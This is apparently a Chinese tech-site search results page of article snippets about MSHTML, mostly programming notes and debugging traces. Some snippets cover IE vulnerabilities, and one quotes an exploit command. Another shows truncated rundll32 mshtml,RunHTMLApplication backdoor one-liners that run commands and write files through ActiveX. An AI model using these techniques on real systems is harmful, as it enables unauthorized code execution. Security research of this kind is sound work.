首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏MasiMaro 的技术博文

    使用MSHTML解析HTML页面

    最近在写一个爬虫项目,本来打算用C/C++来实现,在网上查找有关资料的时候发现了微软的这个MSHTML库,最后发现在解析动态页面的时候它的表现实在是太差:在项目中需要像浏览器那样,执行JavaScript 但是MSHTML在执行JavaScript等脚本时需要配合WebBroswer这个ActiveX控件,这个控件又必须在GUI程序中使用,但是我做的这个功能最终是嵌入到公司产品中发布,不可能为它专门生成一个 虽然最终没有采用这个方案,但是我在开始学习MSHTML并写Demo的过程中还是收益匪浅,所以在这记录下我的成果 解析Html页面 MSHTML是一个典型的DOM类型的解析库,它基于COM组件,在解析Html SafeArrayUnaccessData(sfArray); hresult = m_spDoc->write(sfArray); return m_spDoc; } HTML元素的遍历 MSHTML MSHTML提供的功能主要是用来与IE进行交互,以便很容易实现一个类似于IE的浏览器或者与IE进行交互,但是如果要在控制台下进行相关功能的编写,则显的力不从心 3.

    4.3K30发布于 2018-08-31
  • 来自专栏全栈程序员必看

    关于MSHTML_Html格式

    因此对要操纵对象模型的不论什么人来说都非常重要的是熟悉定义在动态的HTML介绍的概要和MSHTML包括的对象模型參考中的结构和功能。 MSHTML參考的接口和脚本对象这一节说明了对象怎样在DHTML对象模型里面映射到接口。举例来说,使用这一个映射,你能够看到IHTMLDocument2接口映射到文档对象。 集成MSHTML时 集成浏览器控件的一个实例时。 从一个网页中包括的一个Microsoft ActiveX(R)控件。 集成MSHTML时获得文档接口 当集成一个MSHTML对象的时候,使用 CoCreateInstance创建HTML文档对象。 相关的主题 MSHTML编辑功能介绍 MSHTML标记服务介绍 创建HTML资源 MSHTML參考 (译者推荐)加快 DHTML 的一组技巧 发布者:全栈程序员栈长,转载请注明出处:https

    1.3K30编辑于 2022-09-20
  • 来自专栏全栈程序员必看

    mshtml一些用法

    IDispatch *pDisp = webbrowser.get_Document(); IHTMLDocument2* pDocument; IHTMLElementCollection* pCollection; pDisp->QueryInterface(IID_IHTMLDocument2,(void**)&pDocument); HRESULT hr; hr = pDocument->get_all(&pCollection); //hr=pDocument->get_scripts(&pCollection); VARIANT varID; varID = StringToVariant((CString)”TABLE”); pCollection->tags(varID,&pDisp); IHTMLElementCollection* Collection; pDisp->QueryInterface(&Collection); long celem;

    47430编辑于 2022-07-25
  • 来自专栏全栈程序员必看

    关于引用mshtml的问题

    今天看了个验证码识别的代码,其中引用到了mshtml.dll,找了半天原来就是microsoft.mshtml.dll。查这个dll的时候还发现了好几篇关于这个dll添加问题的文章。 第一篇文章: 1.添加引用的问题 一般在开发环境下会在三个地方存有microsoft.mshtml.dll文件。所以在添加引用时,也会出现三个看似一样的项。 解决的方法就是删除现在对mshtml引用。重新选择正确引用。就是选最下面那个。 路径是:X:\Program Files\Microsoft.NET\Primary Interop Assemblies\Microsoft.mshtml.dll 。 第二篇文章: 也是用到了Microsoft mshtml.dll程序集,但是安装在用户电脑后,异常: System.Reflection.TargetInvocationException:

    1.7K10编辑于 2022-07-22
  • 来自专栏Timeline Sec

    CVE-2021-40444:Microsoft MSHTML RCE

    0x02 漏洞概述 编号:CVE-2021-40444 该漏洞存在于 Internet Explorer 引擎 MSHTML 中。 python3 exploit.py host 80 目标受害机打开生成的docx时 0x05 漏洞分析 攻击者可以在 Microsoft Office 文档中创建一个恶意的 ActiveX 控件,供 MSHTML

    1.1K10编辑于 2022-04-06
  • 来自专栏安全漏洞环境学习

    CVE-2019-0541 Windows MSHTML引擎 远程执行代码漏洞复现

    参考链接:https://www.exploit-db.com/exploits/46536

    78610发布于 2019-09-24
  • 来自专栏网络安全技术点滴分享

    MSHTML宿主安全FAQ(上篇):深度解析浏览器引擎安全风险与防护策略

    MSHTML宿主安全FAQ:上篇MSHTML(又称Trident)是Internet Explorer的浏览器渲染引擎。 例如,Windows XP的"添加/删除程序"控制面板就是基于MSHTML实现的。但宿主MSHTML时必须特别注意安全防护,本FAQ将帮助您规避常见的宿主配置错误。 风险等级评估指南风险等级3:静态内容当MSHTML仅渲染本地静态内容(如资源文件、本地HTML)时风险较低仍需警惕攻击者可能通过协议处理器传递命令行参数强制跳转风险等级2:受控内容可将MSHTML实例锁定到特定站点 禁止内容自动执行用户机器上的任意代码风险等级1:完全任意内容必须实施与IE浏览器同等的安全限制需考虑宿主环境中的导航行为特征(如Visual Studio的非常规网页访问场景)风险等级0:零点击攻击场景典型场景:媒体播放器宿主MSHTML

    15400编辑于 2025-07-31
  • 来自专栏giantbranch's blog

    CVE-2013-1347-Microsoft IE CGenericElement 释放重引用漏洞

    HeapFree+0x00000014 664cb9a8 mshtml! CBase::SubRelease+0x00000022 6663c482 mshtml! CElement::PrivateRelease+0x0000002a 6663b034 mshtml!PlainRelease+0x00000025 6669669d mshtml! CHtmPost::Broadcast+0x0000000f 665b7f36 mshtml!CHtmPost::Exec+0x000005f7 665b8a99 mshtml! CHtmPost::Run+0x00000015 665b89fd mshtml!PostManExecute+0x000001fb 665b7c66 mshtml!

    23910编辑于 2024-12-31
  • 来自专栏盟主来了

    2022.6.9日报:正确处理webbrowser控件的键盘消息

    IE6的堆栈,多亏了我把ie6编译出来: mshtml.exe!CDispRoot::ScrollRect(const CRec mshtml.exe! CDispScroller::SetScrollOffset(c mshtml.exe!CView::SmoothScroll(const tagSIZ mshtml.exe! CLayout::ScrollTo(const CSize &  mshtml.exe!CLayout::ScrollByPercent(const C mshtml.exe! CLayout::ScrollByLine(const CSiz mshtml.exe!CLayout::OnScroll(int iDirection mshtml.exe! CLayout::HandleScrollbarMessage( mshtml.exe!CLayout::HandleKeyDown(CMessage  mshtml.exe!

    59820编辑于 2022-06-12
  • 来自专栏盟主来了

    2020.2.2日报:IE兼容模式堆栈

    CDocObjectHost::OnChanged    未知      mshtml.dll!CBase::FirePropertyNotify    未知      mshtml.dll! CMarkup::BlockScriptExecutionHelper    未知      mshtml.dll!CHtmPost::Exec    未知      mshtml.dll! CHtmPost::Run    未知      mshtml.dll!PostManExecute    未知      mshtml.dll! PostManResume    未知      mshtml.dll!CHtmPost::OnDwnChanCallback    未知      mshtml.dll! CDwnChan::OnMethodCall    未知      mshtml.dll!GlobalWndOnMethodCall    未知      mshtml.dll!

    88210发布于 2020-02-27
  • 来自专栏盟主来了

    2020.2.14日报:IE双核模式下,hook另外个地方解决卡慢

    CStorageHelper::Save+0x24 (FPO: [Non-Fpo]) MSHTML! CStorageListHelper::Save+0xb8 (FPO: [Non-Fpo]) MSHTML! CDoc::FollowHyperlink2+0x3b9 (FPO: [30,27,4]) MSHTML! Ordinal137+0x60bf MSHTML!CTExec+0x38 (FPO: [Non-Fpo]) MSHTML! CMarkup::DoAutoSearch+0x2fb (FPO: [Non-Fpo]) MSHTML!

    65720发布于 2020-02-20
  • 来自专栏腾讯安全

    Windows MSHTML远程代码执行漏洞风险通告更新,腾讯安全支持全面检测拦截

    2021年9月8日,微软官方发布风险通告,公开了一个有关Windows MSHTML 的远程代码执行漏洞。 漏洞详情: 2021年9月8日,微软官方发布风险通告,公开了一个有关Windows MSHTML的远程代码执行漏洞。 dword:00000003 "1004"=dword:00000003 腾讯安全解决方案: · 腾讯高级威胁检测系统(NTA,御界)规则库日期2021.9.9之后的版本已支持检测利用Windows MSHTML 远程代码执行漏洞(CVE-2021-40444)的攻击; · 腾讯主机安全(云镜)漏洞库日期2021.9.9之后的版本已支持检测Windows MSHTML 远程代码执行漏洞风险; · 腾讯零信任无边界访问控制系统 (iOA)、腾讯电脑管家均已支持在终端系统检测拦截利用Windows MSHTML 远程代码执行漏洞的攻击。

    88130发布于 2021-09-09
  • 来自专栏Ms08067安全实验室

    利用Javascript做后门的利用方式

    \mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc"); //Write \mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile \mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f \mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","https:/ \mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f

    64320发布于 2020-03-19
  • 来自专栏FreeBuf

    IE漏洞调试之CVE-2013-3893

    结合IDA对mshtml.dll分析相关函数。 mshtml! CServer::SetCapture (636b3d45) 636b63c5 e90c79f2ff jmp mshtml! 跟进看看: mshtml! CTreeNode::NodeAddRef (63662d12) 还是跟进看: mshtml!

    1.7K90发布于 2018-02-05
  • 来自专栏微卡智享

    delphi提示“Undeclared identifier”的缺少引用单元列表

    GetStdHandle Windows HDC Windows HFont Windows HINTERNET WinInet HKEY_CURRENT_USER Windows IHTMLDocument2 MSHTML or MSHTML_TLB IHTMLElement MSHTML or MSHTML_TLB IHTMLEventObj MSHTML or MSHTML_TLB IID_IWebBrowser2

    2.7K20发布于 2019-07-25
  • 来自专栏程序员的SOD蜜

    电脑静音工作,又听不到12306的来票音乐,纠结啊 !但春节前工作多任务重,不能安心工作,就动手做个“无声购票弹窗”工具吧!

    = null) { mshtml.IHTMLElement currDiv = (mshtml.IHTMLElement)div.DomElement; if (currDiv.style.display ; this.TopMost = false; } } 上面的代码中,使用了 mshtml.IHTMLElement 接口,该接口使用了 Microsoft.mshtml.dll 中的功能,可以引用COM组件中的 MSHTML组件得到。 上面也可以不使用mshtml的接口,使用 HTMLDivElementClass 类型也可以,如下面的代码: mshtml.HTMLDivElementClass currDiv = (mshtml.HTMLDivElementClass 此时需要下载 上面的第二个文件 ,下载下来的文件名是 Microsoft.mshtml.dll.bak ,将文件改名为 Microsoft.mshtml.dll 放到 购票程序的运行目录下面去即可。

    1.6K60发布于 2018-02-27
  • 来自专栏极安御信安全研究院

    漏洞分析丨CVE-2012-1873

    接下来就是调用mshtml! 接下来我们对函数mshtml!CTableCol::GetAAspan和函数 mshtml! 随后我们看一下CButtonLayout虚函数地址(x mshtml! CTableLayout::CalculateMinMax断点,断在这里在下mshtml! 4.3、获取虚函数地址得到MSHTML.DLL基址 再次找到虚函数地址0x64fc84f8: 接下来找mshtml基址(lmm mshtml)0x64e70000: 俩者相差0x64fc84f8-0x64e70000

    44310编辑于 2023-05-10
  • 来自专栏信创系统开发

    IE虽死,枷锁犹在:国产化替代的最后一公里

    被保留的“遗毒”:MSHTML 与 IE 模式 虽然 IE11 桌面应用已正式退役,但其核心渲染引擎 MSHTML(又称 Trident)仍作为系统组件继续存在,作为兼容旧有系统的保障。 比“遗毒”更致命的,是 ActiveX 如果说 MSHTML 是“遗毒”,那么 ActiveX 控件就是“剧毒”。 Wine 中的 MSHTML 实现 为解决这一“技术债”,Wine 提供了在 Linux 上运行 Windows 应用的能力,其中就包括对 IE 渲染引擎的适配:Wine 中的 MSHTML 实现。 Wine 的 MSHTML 实现实际上是一个“桥接层”,主要承担以下职责: 将 MSHTML 对象映射为 Gecko 的 nsDOM* 对象; 转换方法调用,如 DOM 操作、脚本执行等; 将 Gecko 的事件翻译为 MSHTML 可识别的事件; 管理两者之间的文档生命周期。

    66110编辑于 2025-08-09
  • 来自专栏giantbranch's blog

    CVE-2013-2551-Microsoft Internet Explorer COALineDashStyleArray 整数溢出漏洞

    InvokeDispatchWithNoThis+0x00000074 6659f7a7 mshtml! CPeerHolder::InvokeExSingle+0x000000e4 6659f6d8 mshtml! CPeerHolder::InvokeExMulti+0x00000139 6659f641 mshtml! CElement::ContextInvokeEx+0x00000064 6659c79a mshtml! CInput::VersionedInvokeEx+0x0000002d 66543104 mshtml!

    44000编辑于 2024-12-31
  • 来自专栏盟主来了

    关于IE的webbrowser设置兼容模式的一点资料

    CMarkup::GetEmulationState+0x3f5 0ae16fbc 637a4c37 MSHTML! CMarkup::PrepareDwnDoc+0x208 0ae173b4 63457bee MSHTML! CMarkup::LoadFromInfo+0x121d 0ae17508 634576f7 MSHTML! JsVarToScriptDirect+0x36495 042ec1b4 074167d8 MSHTML! DllCanUnloadNow+0x5c19e 042ec598 64162cb5 MSHTML!

    1.6K20发布于 2020-03-06
领券